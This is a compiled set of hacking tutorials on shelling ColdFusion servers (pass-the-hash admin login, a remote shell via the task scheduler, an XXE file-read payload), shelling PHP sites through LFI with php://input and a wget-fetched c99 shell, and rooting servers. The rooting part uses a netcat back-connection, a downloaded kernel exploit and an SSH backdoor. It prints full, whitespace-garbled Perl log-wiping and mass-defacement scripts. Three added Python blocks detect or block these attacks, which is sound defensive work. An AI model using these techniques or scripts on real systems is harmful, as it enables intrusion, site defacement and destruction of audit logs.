Now you can crack the password hash and log in with the clear text password, or we can use a little trick to bypass the authentication requirement with a pass-the-hash technique. The login form uses a bit of JavaScript to create an HMAC hash from the admin password hash and a salt value which is changed every 30 seconds. You can find this salt value by simply viewing the source code of the login page; look at the second occurrence of the term 'salt' or review the form input details. Because of this, we pass the hash, generate the HMAC hash on our own and submit it, simulating a successful login! You need to grab the salt from the source:
OK, so you now have the password hash and salt in hand.... Here is some code I whipped up to accomplish this task of logging in real quick, for you to get the authenticated cookie. Quickly enter the needed details and run it. If successful, you will have the authenticated cookie presented to you in the terminal, like so:
Now once you have the authenticated cookie, you're pretty much in. You can use your favorite cookie editor to load up the new 'CFAUTHORIZATION_cfadmin=<SOMEVALUEHEREONSUCCESS>' cookie. Once loaded, simply refresh your browser and you're now logged into the administrative panel for Cold Fusion. Now to try and get a shell up on the server.... If you already know the server path to the web-facing directory then you can move forward; if not, check the 'Mappings' link on the left under 'Server Settings'. This will show a mapping of all paths for CF; by default the /CFIDE dir should be mapped, giving us a usable path in the majority of cases. The Mappings page looks like this:
Once the path is known we will move to the 'Schedule Tasks' page located under 'Debugging & Logging' in the left menu links.
Now you simply point the task scheduler at your remote CFM/JSP shell hosted on a server you control, stored in txt format like an RFI attack payload. You can schedule it as a one-time event; it will default to the current time, so no need to calculate things if you're in a different time zone :) If you need a username/password to access the remote shell file source then provide them as needed in the appropriate fields of the task scheduler. The next step is key: set the 'Publish' option to true so it saves the results to a file (i.e. it grabs our remote shell source and saves it as an executable file). You then provide it with the full path to where you want to write to. In the majority of cases /CFIDE is writable; otherwise poke around or generate errors in SQL queries on the site to get the path (standard Full Path Disclosure rules still apply here). When your form is all set up you can submit to create the scheduled task.
You will need to click on the green check-mark icon to run the scheduled task, which actually executes it and grabs our shell. If it has problems with the remote file you will likely get a warning message of some kind in the admin panel; edit and retry. Upon success, you can point your browser at the path you uploaded your shell to. In most cases Cold Fusion is running on a Windows system with full NT AUTHORITY\SYSTEM privileges, which means you pretty much own the local box now :)
If you find that 'cfexecute' is disabled and blocking your CFM shell from working properly, you can simply re-enable it from the admin panel since you already have access :)

NOTE: JSP is only supported on Enterprise versions of ColdFusion. You can actually determine Enterprise vs Standard by requesting a non-existent .jsp file and judging how the server responds!

You have now successfully shelled a Cold Fusion Server at this point and in most cases have admin privileges to do what you want (create a new user, add it to the admin group, add/enable RDP, enjoy the new RDP). In the rare *nix instances you're likely running as nobody or another non-elevated user, so the usual post-exploitation game plan still applies if you want to take over the whole server (i.e. root the box). Hope you enjoyed this first part of the series; the second part will follow shortly....
Hacking Cold Fusion Servers - Part II

Now I will go over two more vulnerabilities which can potentially be leveraged to attack Cold Fusion Servers. This time we will be looking at exploiting a weak uploader as well as another LFD/LFI vulnerability, but with a small twist. If you didn't catch the first part then I encourage you to read that thread before reading this one, as it makes for a better attack flow in general. Assuming you're all set, let's begin....

Now one thing to be aware of is that Cold Fusion packed an FCKEditor in with v8 when it was first released, and they didn't do proper checking on the upload types. If you give it a file as .txt but write to .cfm or .jsp it thinks this is OK! This exploit will take some coding abilities on your behalf, or the ability to use Metasploit, as it has a nice pre-built exploit for this one (the Java Meterpreter works best for the payload). You basically point and shoot with MSF and hope for the best. If the uploader is present it will try to send a multipart upload request via POST. If successful you should be able to find a shell in the '/userfiles/file/' directory of the site. Now I have coded my own script for this and tried with Metasploit, but have not successfully exploited this myself, so I'm not going to post my code just yet; I would like to confirm it first. You have MSF as a crutch for now; you can find the module by referencing CVE-2009-2265, or just type 'use exploit/windows/http/coldfusion_fckeditor'. I will update this section when I have confirmation of working code on my part.....

OK, so in addition to the LFD/LFI to RCE vulnerability we demonstrated in part I of this series, there is another LFD/LFI vulnerability. This time it is XML External Entities (XXE) Injection in the Data Services, which allows a wide range of XML based attacks, including Local File Disclosure, TCP scans and Denial of Service conditions, which can be achieved by recursive entity injection, attribute blow-up and other types of injection. For more information about the implications associated with this vulnerability, refer to RFC 2518 (17.7 Implications of XML External Entities): http://www.ietf.org/rfc/rfc2518.txt. I will show you how we can exploit this to map out the target server and read files. Basically we send a carefully crafted XML request to the Data Service file handler, and if it is vulnerable to XXE Injection it will spit back the results we ask for. Here are some common files to check:
/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure

You can accomplish this with the Hackbar add-on in Firefox easily enough; Burp or Netcat is just as easy. Essentially we can use the XML code below as a framework for our file injection and enumeration; simply pass it as POST data to the vulnerable Data Service:

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE test [ <!ENTITY x3 SYSTEM "<INSERT_PATH/FILE_HERE>"> ]><amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>

Simply replace '<INSERT_PATH/FILE_HERE>' with the path to read and let the requests rip, like so:
Now the cool thing here is that it works regardless of OS, since it is due to how the Data Services are handling and parsing the XML data being passed; just make sure you request the proper file type for the designated system type (check the server response if you have no idea)...
Also, in addition to reading files, you can simply pass a directory and it will spit back the directory contents, making it very easy to map things out and find files worth reading. Limited privileges may restrict some file reading, but there is still plenty to cause trouble, enumerate lots of info, and possibly even read the site configuration details...
In addition to these named exploits in this Cold Fusion series, the same old usual suspects are still fair game here. SQL injection vulnerabilities are just as common as on PHP or ASP based sites, and 'cfinclude's can enable source disclosures. In many cases the db can be compromised and Java commands may be leveraged to further extend the potential attack vectors and escalation platform beyond that of a standard injection, so keep your eyes out and don't be afraid to take on a new site just because it has .CFM or .JSP files instead of the oh so popular .PHP or .ASP. Hope you enjoyed this short series on hacking Cold Fusion Servers. All material for the series was available on the net in various places; all I did was wrap it up for you and try to make it a little easier to understand. If you have any questions or suggestions please post them here or let me know via PM.
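Both the 'locale' LFD from Part I and the Data Services XXE from Part II leave a recognisable shape in request traffic. The following Python is an added example written for this page, not code from the original author: it scans a constructed request log (method, target, body) for a locale parameter that climbs directories, names password.properties or carries a NUL byte, and for a DOCTYPE with an external entity posted to one of the Data Services endpoints listed above. The log layout and the sample requests are constructed for the demo; a real deployment needs the POST body from a WAF or reverse-proxy capture, because a plain access log does not record it.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Data Services endpoints named in Part II; a DOCTYPE declaring an external
# entity posted to any of these is the XXE pattern to flag.
CF_DATA_SERVICE_PREFIXES = (
    "/flex2gateway", "/messagebroker", "/blazeds/messagebroker",
    "/samples/messagebroker", "/lcds/messagebroker", "/lcds-samples/messagebroker",
)

# Directory traversal in either slash style, plus the still-encoded form.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|%2e%2e", re.IGNORECASE)
# <!ENTITY name SYSTEM "..."> or a parameter entity <!ENTITY % name SYSTEM "...">
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def locale_lfd_suspect(query: str) -> bool:
    """CVE-2010-2861 shape: a 'locale' value that traverses directories,
    names password.properties, or carries a NUL byte to cut off the suffix."""
    for value in parse_qs(query, keep_blank_values=True).get("locale", []):
        decoded = unquote(value)  # parse_qs decoded once; a second pass catches %252e
        if (TRAVERSAL_RE.search(decoded)
                or "password.properties" in decoded.lower()
                or "\x00" in decoded):
            return True
    return False


def xxe_suspect(path: str, body: str) -> bool:
    """XML posted to a Data Services endpoint that declares an external entity."""
    if not path.lower().startswith(CF_DATA_SERVICE_PREFIXES):
        return False
    return "<!DOCTYPE" in body.upper() and EXTERNAL_ENTITY_RE.search(body) is not None


def scan_requests(lines):
    """Each constructed log line is METHOD<TAB>TARGET<TAB>BODY (body may be empty).
    Returns (label, target) for every request matching one of the two patterns."""
    findings = []
    for line in lines:
        method, target, body = line.split("\t", 2)
        parts = urlsplit(target)
        if locale_lfd_suspect(parts.query):
            findings.append(("locale-lfd", target))
        if method.upper() == "POST" and xxe_suspect(parts.path, body):
            findings.append(("xxe", target))
    return findings


# Constructed sample traffic for the demo; not captured from a real server.
SAMPLE_REQUESTS = [
    "GET\t/CFIDE/administrator/enter.cfm?locale=en\t",
    "GET\t/CFIDE/administrator/enter.cfm?locale=../../../../../../lib/password.properties%00en\t",
    "GET\t/index.cfm?page=home&locale=%252e%252e/%252e%252e/etc/passwd\t",
    "POST\t/flex2gateway/http\t<?xml version=\"1.0\"?><!DOCTYPE t [ <!ENTITY x3 SYSTEM \"/etc/passwd\"> ]>"
    "<amfx ver=\"3\"><body><string>&x3;</string></body></amfx>",
    "POST\t/flex2gateway/http\t<amfx ver=\"3\"><body><string>ping</string></body></amfx>",
]

if __name__ == "__main__":
    for label, target in scan_requests(SAMPLE_REQUESTS):
        print(f"{label}: {target}")
```

The second unquote in locale_lfd_suspect is deliberate: parse_qs already decodes one layer, so double-encoded traversal (%252e) only becomes visible after another pass. The XXE check keys on the endpoint path first so that ordinary XML carrying a DOCTYPE elsewhere on the site does not trip it.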
LFI exploitation via php://input [Shelling Sites]

Hey guys, today I'll be explaining how to shell a website using the "php://input" method via LFI. So let's get started. Now let's have our target, shall we. As an example, your target URL should look like this:
Code: http://www.site.com/index.php?page=
You can have anything similar to that as long as you are able to read files and obtain an "include" error. First things first, give it a shot and see if you can read "/etc/passwd". The URL will look like:
Code: http://www.site.com/index.php?page=/etc/passwd
If successful, you'll be seeing a page that looks like this:

Now let's try reading:
Code: /proc/self/environ
Code: /proc/self/fd
So the URL will become:
Code: http://www.site.com/index.php?page=/proc/self/environ
Code: http://www.site.com/index.php?page=/proc/self/fd
Hmm, seems like nothing is being displayed, even though I've added a null byte at the end of the URL.

Well, not to worry, it's time to use our backup method. The "php://input" method will let us run certain commands through the include, hence it enables us to upload a shell. This can be done using the "Hackbar" or by using "Live HTTP headers". I'll show you how to exploit via php://input using the "Hackbar". So let's check what we're supposed to use in the Hackbar:
Now let's try putting this method into action. Look at the picture carefully.
The URL will be:
Code: http://www.site.com/index.php?page=php://input
and the POST DATA:
Code: <? system('uname -a'); ?>
Other commands:
List directories
Code: <? system('ls'); ?>
Identification
Code: <? system('id'); ?>
Convert format
Code: <? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now, shall we. Grab a shell from sh3ll.org or anywhere else. For now, we'll be using the normal c99 shell:
Code: http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site. So our POST DATA will be:
Code: <? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php'); ?>
This is how it's gonna look. Now that you've spawned a shell, you can navigate to it on the site:
Code: http://www.site.com/shell.php
You can watch a video tutorial below so that it'll be easier to understand. Have fun.
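The include at the root of this technique (include($page) with no checks, as in the vulnerable script at the top of this guide) is what lets php://input, /proc/self/environ and the null byte through. As an added example that is not part of the original tutorial, the following Python shows the validation a defender would put in front of such an include: an allowlist of page names, a strict character class, and a canonical-path check that the resolved file really sits below the pages directory. The directory, page names and probe values are constructed for the demo; the same three checks translate directly to the PHP script shown earlier.

```python
import os
import re
import tempfile

# Page names are restricted to a short identifier: no slashes, dots, colons or
# NUL bytes, so neither "../", "/etc/passwd", "php://input" nor "home%00" survive.
PAGE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def resolve_page(page: str, base_dir: str, allowed: frozenset) -> str:
    """Map an untrusted ?page= value to a file under base_dir, or raise ValueError.

    Three layers: an explicit allowlist of page names, a strict character class,
    and a canonical-path check that the file really sits below base_dir (the last
    one is defence in depth against symlinks planted inside base_dir)."""
    if "\x00" in page:
        raise ValueError("NUL byte in page name")
    if "://" in page or page.startswith(("php:", "data:", "expect:")):
        raise ValueError("stream wrapper in page name")
    if not PAGE_NAME_RE.fullmatch(page):
        raise ValueError("page name has characters outside [A-Za-z0-9_-]")
    if page not in allowed:
        raise ValueError("page not in allowlist")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path escapes the pages directory")
    if not os.path.isfile(candidate):
        raise ValueError("page file does not exist")
    return candidate


def demo() -> dict:
    """Build a throwaway pages directory and show which inputs get through."""
    allowed = frozenset({"home", "about"})
    results = {}
    with tempfile.TemporaryDirectory() as base:
        for name in allowed:
            with open(os.path.join(base, name + ".php"), "w") as fh:
                fh.write("<?php echo 'static page'; ?>\n")
        # Constructed probe values, including the ones used in the tutorial above.
        probes = ["home", "about", "php://input", "/etc/passwd", "../../etc/passwd",
                  "/proc/self/environ", "home\x00.html", "admin"]
        for probe in probes:
            try:
                resolve_page(probe, base, allowed)
                results[probe] = "included"
            except ValueError as exc:
                results[probe] = "rejected: " + str(exc)
    return results


if __name__ == "__main__":
    for probe, outcome in demo().items():
        print(repr(probe), "->", outcome)
```

The allowlist alone would already stop every probe in the demo; the character class and the realpath check are there so that a later change to the allowlist (or a symlink dropped into the pages directory) cannot quietly reopen the hole.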
Server Rooting Via Shell and Mass defacement script

Now let's kill the root:

Getting a back connection to the server
Copy the Netcat directory to C:
Open command prompt, type: cd C:\NETCAT
It'll look like this:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\kislay>cd c:\netcat
c:\netcat>
Now type: nc -l -v -p 2121
It'll look like:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...
Open your shell in your browser and go to the back connection tab; if it is not there, get a shell like "B374k" or any other of your choice. Specify your IP & port as 2121. Press connect; now you'll get a shell to the server, and you can give commands to the server through that shell.

Getting the right exploit for the server
Type: uname -a & hit enter. It'll look something like this:
[admin@www.saijyotishvani.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
It shows the kernel version of the server is 2.6.18-194.26.1.el5 & the year is 2010. You need to find a perfect exploit for it. You can find them at:
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
# Leetupload.com
# r00tw0rm.com

Compiling & executing the exploit
Now I've got an exploit, & it is written in C. So I can't execute it by just uploading it; I need to compile it. Before proceeding further, cd into the tmp directory, because it is always writable. So type:
cd /home/XXXXX/public_html/tmp // The path can be different, replace it with yours.
So first I'll get the exploit onto the server, so I type:
wget http://exploitsite.net/exploits/my_exploit.c // Note: There is no such site, I'm just using it to show you.
It'll look something like this:
[admin@www.targetsite.com /home/saijyoti/public_html/tmp]$ wget http://exploitsite.net/exploits/my_exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/exploits/my_exploit.c
Resolving www.exploitsite.net... 120.139.90.84
Connecting to www.exploitsite.net|120.139.90.84|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `my_exploit.c'
0K .......... .... 100% 189K=0.08s
2011-01-25 08:21:44 (189 KB/s) - `my_exploit.c' saved [15088/15088]
Now change the permission of the exploit to 777. Type: chmod 777 my_exploit.c
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ chmod 777 ImpelDown.c
Now the exploit is on my server; I just need to compile & execute it. So I'll give the command: gcc -o exploit exploit.c
It'll compile & save the exploit as exploit. It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o exploit exploit.c
The next step is to execute it, so we'll type: ./exploit
It may look like:
[admin@www.targetsite.com /home/targetsite/public_html/tmp]$ gcc -o ImpelDown.c
Now it says got root. Let's check if it's true. Type: id
It may look like:
uid=0(saijyoti) gid=0(saijyoti) groups=0(root)
Which means I got root :)

Installing a backdoor
Type: wget urlofbackdoor.com/sshdoor.zip
Then type: unzip sshdoor.zip
Then type: ./run pass port
^ replace pass with your password, & a port. Now connect with putty & enjoy root privileges. ;)

Methods to execute exploits written in other languages
# C exploit: gcc -o exploit exploit.c ; chmod +x exploit ; ./exploit
# Perl: perl exploit.pl
# Python: python exploit.py
# PHP: php exploit.php
# zip: unzip exploit.zip ; ./run

Cleaning logs
# You can use my log cleaner to clear your track :D. It is written in Perl. Save it as anything.pl & to execute type: perl anything.pl
Here is the code:
[perl] #!usr/bin/perl -w#Warningsenabled! #Log cleanerversionPublic #Give CreditsWhere Needed - Kouros! #This tooktime,Hope youfuckinguse it:D #Reportbugs to info@Kouros-bl4ckhat.com #NOTE - YOU MUST BE ROOT! printqq^ #################################### # Log Cleaner3.0 PUBLIC # # Kouros#
    # # # VirangarSecurityTeam# #http://www.Kouros-bl4ckhat.com# #################################### ^; while(1) { print"Enter WhichOS: "; #User Input chomp($os= <STDIN>); #Takesit intomemory if($oseq"help"){ print"[+]EnterYour OS!Choose from'linux','aix','sunos','irix'n"; print"[+]HitenterwithOS,Let the scriptdo itsworkn"; print"[+]Note:YouMUST Be Root!n"; print"[+]ContactInfo[at]Kouros-bl4ckhat[dot] Com"; print"[+]ForBug finds...Have Fun!n"; print"[+] - Kouros"; } if($oseq"linux"){ #If linux typed,dothe followingandstartbrackets foreachmy $logphile(@linux){ unlink($logphile) ||print"[-]Fuckedup:"$logphile":$!n"; } } elsif($oseq"sunos"){ #If sunostyped,dothe followingandstartbrackets foreachmy $logphile(@sunos){ unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"aix"){ #If aix typed,dothe followingandstart brackets foreachmy $logphile(@aix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } elsif($oseq"irix"){ #If irix typed,dothe followingandstartbracket foreachmy $logphile(@irix) { unlink($logphile) ||print"[-] Fuckedup:"$logphile":$!n"; } } else { print"UmmWTF !?n";} #Logs of Irix Systems { #Start Irix Bracket @irix = ("/var/adm/SYSLOG","/var/adm/sulog","/var/adm/utmp","/var/adm/utmpx", "/var/adm/wtmp","/var/adm/wtmpx","/var/adm/lastlog/", "/usr/spool/lp/log","/var/adm/lp/lp-errs","/usr/lib/cron/log", "/var/adm/loginlog","/var/adm/pacct","/var/adm/dtmp", "/var/adm/acct/sum/loginlog","var/adm/X0msgs","/var/adm/crash/vmcore", "/var/adm/crash/unix")#EndArray } #End Irix Bracket #Log sof Aix Systems { #Start Aix Bracket @aix = ("/var/adm/pacct","/var/adm/wtmp","/var/adm/dtmp","/var/adm/qacct", "/var/adm/sulog","/var/adm/ras/errlog","/var/adm/ras/bootlog", "/var/adm/cron/log","/etc/utmp","/etc/security/lastlog", "/etc/security/failedlogin","usr/spool/mqueue/syslog")#EndArray
    } #End AixBracket #Logs of SunOSSystems { #Start SunOSBracket @sunos= ("/var/adm/messages","/var/adm/aculogs","/var/adm/aculog", "/var/adm/sulog","/var/adm/vold.log","/var/adm/wtmp", "/var/adm/wtmpx","/var/adm/utmp","/var/adm/utmpx", "/var/adm/log/asppp.log","/var/log/syslog", "/var/log/POPlog","/var/log/authlog","/var/adm/pacct", "/var/lp/logs/lpsched","/var/lp/logs/requests", "/var/cron/logs","/var/saf/_log","/var/saf/port/log") #EndArray } #End Sunosbracket #Logs of Linux Systems { #Start Linux Bracket @linux = ("/var/log/lastlog","/var/log/telnetd","/var/run/utmp", "/var/log/secure","/root/.ksh_history","/root/.bash_history", "/root/.bash_logut","/var/log/wtmp","/etc/wtmp", "/var/run/utmp","/etc/utmp","/var/log","/var/adm", "/var/apache/log","/var/apache/logs","/usr/local/apache/logs", "/usr/local/apache/logs","/var/log/acct","/var/log/xferlog", "/var/log/messages/","/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog","/var/log/proftpd.access_log", "/var/log/httpd/error_log","/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log","/etc/mail/access", "/var/log/qmail", "/var/log/smtpd","/var/log/samba", "/var/log/samba.log.%m","/var/lock/samba","/root/.Xauthority", "/var/log/poplog","/var/log/news.all","/var/log/spooler", "/var/log/news","/var/log/news/news","/var/log/news/news.all", "/var/log/news/news.crit","/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err","/var/log/news/suck.notice", "/var/spool/tmp","/var/spool/errors","/var/spool/logs","/var/spool/locks", "/usr/local/www/logs/thttpd_log","/var/log/thttpd_log", "/var/log/ncftpd/misclog.txt","/var/log/nctfpd.errs", "/var/log/auth") #Endarray } #End linux bracket } #Ends Loop [/perl] Mass deface I've a perl tomass deface sitesonthe server.executeitasthe same way as above. [perl] # MSRml V 0.1 # # # # MOROCCO.SECURITY.RULZmass defacerandlogeraser# # # # codedbyPRI[ll #
    # # # !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!# ## # 05/07/2005 # # # # usage : perl MSRml.pl <pathto index># # # # example :perl MSRml.pl /tmp/index.html # # # # the_r00t3r@hotmail.com# #!/usr/bin/perl use strict; my $index = $ARGV[0]; if ($ARGV[0]) { if( -e $index ) { system"echo -e "33[01;34mStarted MSRml V0.1 by PRI[ll Ok!!33[01;37m"n"; system"echo -e "033[01;37mDefacing all homepages..."n"; system"find/ -name "index*"-execcp$index {} ;"; system"find/ -name "main*"-execcp$index {} ;"; system"find/ -name "home*"-execcp$index {} ;"; system"find/ -name "default*"-execcp$index {} ;"; system"echo -e "033[01;37m[+] done ! all sitesinthisbox are defaced!"n"; system"echo -e "033[01;37m----------------------------------------------------------"n"; system"echo -e "033[01;37mCleaningup logs..."n"; system"echo -e "33[01;34m---------erasingdefaultlogfiles(toofast =))---------33[01;37m"n"; if( -e "/var/log/lastlog") { system'rm -rf /var/log/lastlog'; system"echo -e "033[01;37m [*]/var/log/lastlog -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/lastlog - Nosuchfile ordirectory033[01;37m"n"; } if( -e "/var/log/wtmp") { system'rm -rf /var/log/wtmp'; system"echo -e "033[01;37m [*]/var/log/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log/wtmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/etc/wtmp") {
    system'rm -rf /etc/wtmp'; system"echo-e "033[01;37m [*]/etc/wtmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/wtmp - No such file ordirectory033[01;37m"n"; } if( -e "/var/run/utmp") { system'rm -rf /var/run/utmp'; system"echo -e "033[01;37m [*]/var/run/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/run/utmp - No suchfile ordirectory033[01;37m"n"; } if( -e "/etc/utmp") { system'rm -rf /etc/utmp'; system"echo -e "033[01;37m [*]/etc/utmp -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/etc/utmp - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/log") { system'rm -rf /var/log'; system"echo -e "033[01;37m [*]/var/log-erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/log- Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/logs") { system'rm -rf /var/logs'; system"echo -e "033[01;37m [*]/var/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/logs - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/adm") { system'rm -rf /var/adm'; system"echo -e "033[01;37m [*]/var/adm-erasedOk"n"; }
    else { system"echo -e "033[01;31m[*]/var/adm- No such file ordirectory033[01;37m"n"; } if( -e "/var/apache/log") { system'rm -rf /var/apache/log'; system"echo -e "033[01;37m [*]/var/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/log - Nosuch file ordirectory033[01;37m"n"; } if( -e "/var/apache/logs") { system'rm -rf /var/apache/logs'; system"echo -e "033[01;37m [*]/var/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/var/apache/logs - Nosuch file ordirectory033[01;37m"n"; } -10- C:UserskislayDesktoprooted.txt25 January2011 20:54 if( -e "/usr/local/apache/log") { system'rm -rf /usr/local/apache/log'; system"echo -e "033[01;37m [*]/usr/local/apache/log -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/log - Nosuchfile or directory033[01;37m"n"; } if( -e "/usr/local/apache/logs") { system'rm -rf /usr/local/apache/logs'; system"echo -e "033[01;37m [*]/usr/local/apache/logs -erasedOk"n"; } else { system"echo -e "033[01;31m[*]/usr/local/apache/logs - Nosuchfile or directory033[01;37m"n"; } if( -e "/root/.bash_history") { system'rm -rf /root/.bash_history'; system"echo -e "033[01;37m [*]/root/.bash_history -erasedOk"n";
    } else { system"echo -e "033[01;31m[*]/root/.bash_history- Nosuchfile ordirectory033[01;37m"n"; } if( -e "/root/.ksh_history") { system'rm -rf /root/.ksh_history'; system"echo -e "033[01;37m [*]/root/.ksh_history -erasedOk"n"; } else { system"echo-e "033[01;31m[*]/root/.ksh_history - Nosuchfile ordirectory033[01;37m"n"; } system"echo -e "033[01;37m[+] -----doneall defaultlogandbash_historyfileserased!!"n"; system"echo -e "33[01;34m---------Now Erasingthe restof the machine logfiles(canbe long:S)---------33[01;37m"n"; system'find/ -name *.bash_history -execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_historyfiles -erasedOk!"n"; system'find/ -name *.bash_logout-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.bash_logoutfiles -erasedOk!"n"; system'find/ -name "log*"-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all log* files -erasedOk!"n"; system'find/ -name *.log-execrm-rf {} ;'; system"echo -e "033[01;37m[*] all *.logfiles -erasedOk!"n"; system"echo -e "33[01;34m-------[+] !done all logfileserased![+]-------33[01;37m"n"; system"echo -e "33[01;34m---------------------------------------------------33[01;37m"n"; system"echo -e "33[01;34m-----------------MSRmlV 0.1----------------------33[01;37m"n"; } else { system"echo -e "033[01;31m[-] Failed!the path to u're index couldnotbe found !033[01;37m"n"; exit; } } else { system"echo -e "033[01;37m!!Morocco.Security.Rulzmassdefacerandlogeraser!!"n"; system"echo -e "033[01;37m!!!!!!!!!!!!!!!!!!codedbyPRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n"; system"echo -e "033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!033[01;37m"n"; system"echo -e "033[01;37musage : perl $0 <path toou're index>"n"; system"echo -e "033[01;37mexample : perl $0 /tmp/index.html"n"; exit; }
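The two Perl scripts above overwrite every index*, main*, home* and default* file they can find and delete or truncate the listed log files. As an added defender's example, not part of the original post or of either script, the following Python builds a SHA-256 baseline of a web root and its logs and reports files that changed, vanished, appeared or shrank, which is exactly the footprint those scripts leave. The directory layout, file contents and the simulated tampering are constructed for the demo; on a real host the baseline would be stored off-box and the comparison run from cron or a monitoring agent.

```python
import hashlib
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Relative path -> (sha256, size) for every regular file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            baseline[rel] = (sha256_file(full), os.path.getsize(full))
    return baseline


def compare(baseline: dict, root: str) -> dict:
    """Report content changes, vanished files, new files and files that shrank.
    A log that got smaller without rotation is the tell-tale of a cleaner."""
    current = build_baseline(root)
    report = {"modified": [], "missing": [], "added": [], "shrunk": []}
    for rel, (digest, size) in baseline.items():
        if rel not in current:
            report["missing"].append(rel)
            continue
        cur_digest, cur_size = current[rel]
        if cur_digest != digest:
            report["modified"].append(rel)
        if cur_size < size:
            report["shrunk"].append(rel)
    report["added"] = list(set(current) - set(baseline))
    for key in report:
        report[key].sort()
    return report


def demo() -> dict:
    """Constructed scenario: baseline a tiny web root plus two logs, then
    simulate what the scripts above do (overwrite index pages, drop a file,
    delete one log and truncate another)."""
    with tempfile.TemporaryDirectory() as root:
        for sub in ("site1", "site2", "logs"):
            os.makedirs(os.path.join(root, sub))
        files = {
            "site1/index.html": "<h1>site one</h1>\n",
            "site2/index.php": "<?php echo 'site two'; ?>\n",
            "site2/style.css": "body { color: black; }\n",
            "logs/access.log": "10.0.0.5 - - [25/Jan/2011:20:54:00 +0000] \"GET / HTTP/1.1\" 200 12\n" * 20,
            "logs/error.log": "[warn] constructed sample line\n" * 10,
        }
        for rel, content in files.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(content)
        baseline = build_baseline(root)

        # Simulated tampering (constructed for the demo).
        for rel in ("site1/index.html", "site2/index.php"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("<h1>defaced by someone</h1>\n")
        with open(os.path.join(root, "site2/c99.php"), "w") as fh:
            fh.write("<?php /* dropped file */ ?>\n")
        os.remove(os.path.join(root, "logs/access.log"))
        with open(os.path.join(root, "logs/error.log"), "w"):
            pass  # truncated to zero bytes
        return compare(baseline, root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Hashing with size alongside matters: a log that is appended to changes its hash legitimately every minute, so "modified" is noise for logs, while "shrunk" or "missing" on a log file is the signal worth alerting on.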
Getting a Shell of a website by W3af

